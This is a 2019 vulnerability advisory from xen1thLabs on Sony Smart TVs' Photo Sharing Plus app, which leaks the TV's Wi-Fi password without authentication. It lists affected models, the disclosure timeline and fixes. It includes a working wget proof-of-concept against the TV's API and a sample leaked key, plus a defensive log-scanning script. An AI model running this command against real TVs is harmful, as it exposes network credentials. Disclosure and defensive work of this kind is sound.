Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

23 April 2019












6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)



















Sony Smart TVs (non-exhaustive list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E








The “Photo Sharing Plus” application, which runs as part of the Smart TV functionality, is used to upload photos from a smartphone to the TV for display on the television screen. When the application is launched, it turns the TV into a Wi-Fi access point and displays the Wi-Fi password, which lets users authenticate and share media content on the Sony Smart TV.

The vulnerability allows an unauthenticated attacker on the LAN/Wi-Fi to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started.




An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.




After the application is started, the following example retrieves the wireless password created by the TV over the LAN, without authentication ([ip_tv] stands for the IP address of the TV):




root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo" ,"params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/


{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/" ,"touchPadRemote":"notSupported"}],"id":80}



The password is 8362tbwX.

By reading the logs on the TV, we can confirm that the password has been delivered over HTTP, without authentication:



01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/" ,"touchPadRemote":"notSupported"}],"id":80}
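For triage, the log format above can be scanned for responses that hand out a Wi-Fi key. The following is an added example, not part of the original advisory or Sony's code: it assumes logcat text in the format shown above, uses constructed sample lines with a constructed SSID and key, and redacts the key so the report does not repeat the secret.

```python
import json
import re

# Constructed sample log lines in the format shown in the advisory.
# Line 3 is deliberately truncated to exercise the malformed-JSON path.
SAMPLE_LOG = r'''
01-01 07:47:20.101 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[],"id":79}
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-XX-EXAMPLE","keyType":"","key":"CONSTRUCTED1","deviceName":"","url":"http:\/\/" ,"touchPadRemote":"notSupported"}],"id":80}
01-01 07:47:25.002 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-XX-EXAMPLE","key":
'''.strip()

# Capture the JSON body that follows the "HttpEndPoint: send:" marker.
SEND_RE = re.compile(r"HttpEndPoint: send: (\{.*)$")


def redact(secret):
    """Keep only the length so the finding never re-leaks the key."""
    return "*" * len(secret)


def find_key_disclosures(log_text):
    """Return one finding per response entry that carries an SSID and a key."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = SEND_RE.search(line)
        if not match:
            continue
        try:
            body = json.loads(match.group(1))
        except json.JSONDecodeError:
            # Truncated or corrupted log line: flag for manual review.
            findings.append({"line": lineno, "status": "unparsed"})
            continue
        results = body.get("result") if isinstance(body, dict) else None
        for entry in results if isinstance(results, list) else []:
            if isinstance(entry, dict) and entry.get("ssid") and entry.get("key"):
                findings.append({
                    "line": lineno,
                    "status": "key_disclosed",
                    "ssid": entry["ssid"],
                    "key": redact(entry["key"]),
                    "id": body.get("id"),
                })
    return findings


if __name__ == "__main__":
    for finding in find_key_disclosures(SAMPLE_LOG):
        print(finding)
```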
































03/10/2018 – Vulnerability found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms vulnerability

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to xen1thLabs talk at HiTB Dubai 2018 as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thLabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory  

21/03/2019 – Automatic response from is no more in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affect a range of models and “Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019.”

16/04/2019 - Sony does not provide a CVE. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"

17/04/2019 - xen1thLabs requests a CVE from MITRE

23/04/2019 - Public disclosure












Apply patches provided by Sony

Firmware update to v6.5830 from 01-22-2019 (including security patches?)


Firmware update to v6.5830 from 01-22-2019 (not including security patches)


End of Photo Sharing Plus 11/22/2018




xen1thLabs - Telecom Lab